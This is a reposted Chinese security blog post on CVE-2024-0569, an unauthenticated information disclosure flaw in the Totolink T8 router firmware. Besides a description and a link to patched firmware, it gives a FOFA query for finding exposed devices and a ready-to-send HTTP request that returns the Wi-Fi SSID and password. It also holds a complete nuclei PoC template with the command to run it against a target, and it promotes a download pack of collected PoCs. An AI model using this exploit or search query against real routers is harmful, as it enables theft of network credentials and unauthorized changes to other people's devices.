CVE-2024-0569

admin 2024年1月19日11:19:54评论58 views字数 2506阅读8分21秒阅读模式

使

应粉丝要求小编将往期poc和我在网上收集的一些poc打包分享到网盘了。同时分享了大量电子书和护网常用工具,在文末免费获取。

01

漏洞名称

Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露漏洞

02

漏洞影响

Totolink T8 4.1.5cu.833_20220905版本

CVE-2024-0569

03

漏洞描述

该漏洞存在于Totolink T8 4.1.5cu.833_20220905版本中。允许远程攻击者在不登录的情况下通过端口80、路径/cgi-bin/cstecgi.cgi、参数topicurl获取Wi-Fi系统信息并修改系统相关设置。

该版本不验证管理员是否登录,因此攻击者不需要带入管理员登录后获取的Cookie,可以直接获取Wi-FiSSID和Wi-Fi密码。

发送修改系统设置的请求而不引入任何cookie可以修改系统设置,在正常和安全的情况下,必须验证cookie是在管理员登录后引入的。

攻击者可以远程发起攻击。该漏洞已經公开披露並可能被滥用。升級到版本4.1.5cu.862_B20230228可以解決此问題。

04

FOFA搜索语句
title="TOTOLINK"

如果有哪位道友知道怎么筛选具体版本的话可以私信告诉我下

CVE-2024-0569

05

漏洞复现

向靶场发送如下数据包

在没有任何会话的情况下,可以在任何设置下修改路由器

POST /cgi-bin/cstecgi.cgi HTTP/1.1Host:192.168.0.1Content-Length:41Accept:application/json,text/javascript,*/*;q=0.01X-Requested-with: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36Content-Type: application/x-www-form-urlencoded:charset=UTF-8Origin: http://192.168.0.1Referer: http://192.168.0.1/advance/index.html?time=1671152380564Accept-Encoding:gzip,deflateAccept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7Connection:close{"topicurl":"getSysStatusCfg","token":""}

CVE-2024-0569

漏洞复现成功

06

nuclei poc

poc文件内容如下

id: CVE-2024-0569info:  name: totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露漏洞  author: fgz  severity: high  description: |    该漏洞存在于Totolink T8 4.1.5cu.833_20220905版本中。该漏洞影响了文件/cgi-bin/cstecgi.cgi中Setting Handler組件的getSysStatusCfg功能。将参数ssid/key的操纵导致信息泄露。攻击者可以远程发起攻击。该漏洞已經公开披露並可能被滥用。升級到版本4.1.5cu.862_B20230228可以解決此问題。  reference:    None  metadata:    verified: true    max-request: 1    fofa-query: "totolink"  tags: cve-2024http:  - raw:      - |        POST /cgi-bin/cstecgi.cgi HTTP/1.1        Host: {{Hostname}}        Content-Length: 41        Accept: application/json,text/javascript,*/*;q=0.01        X-Requested-with: XMLHttpRequest        User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36        Content-Type: application/x-www-form-urlencoded:charset=UTF-8        Origin: {{BaseURL}}        Referer: {{BaseURL}}/advance/index.html?time=1671152380564        Accept-Encoding: gzip,deflate        Accept-Language: zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7        Connection: close        {"topicurl":"getSysStatusCfg","token":""}    matchers:      - type: dsl        dsl:          - "status_code == 200 && contains(body, 'ssid') && contains(body, 'key') && contains(body, 'channel')"        condition: and

运行POC

nuclei.exe -t mypoc/cve/CVE-2024-0569.yaml -u http://x.x.x.x

CVE-2024-0569

07

修复建议

Totolink表示,该漏洞已完全修补版本4.1.5cu.862 B20230228和最新的修补版本可以下载在

https://download.totolink.tw/uploads/firmware/T8/TOTOLINK_T8_V4.1.5cu.862_B20230228.zip

08

原文始发于微信公众号(AI与网安):CVE-2024-0569

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月19日11:19:54
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2024-0569https://cn-sec.com/archives/2409098.html

发表评论

匿名网友 填写信息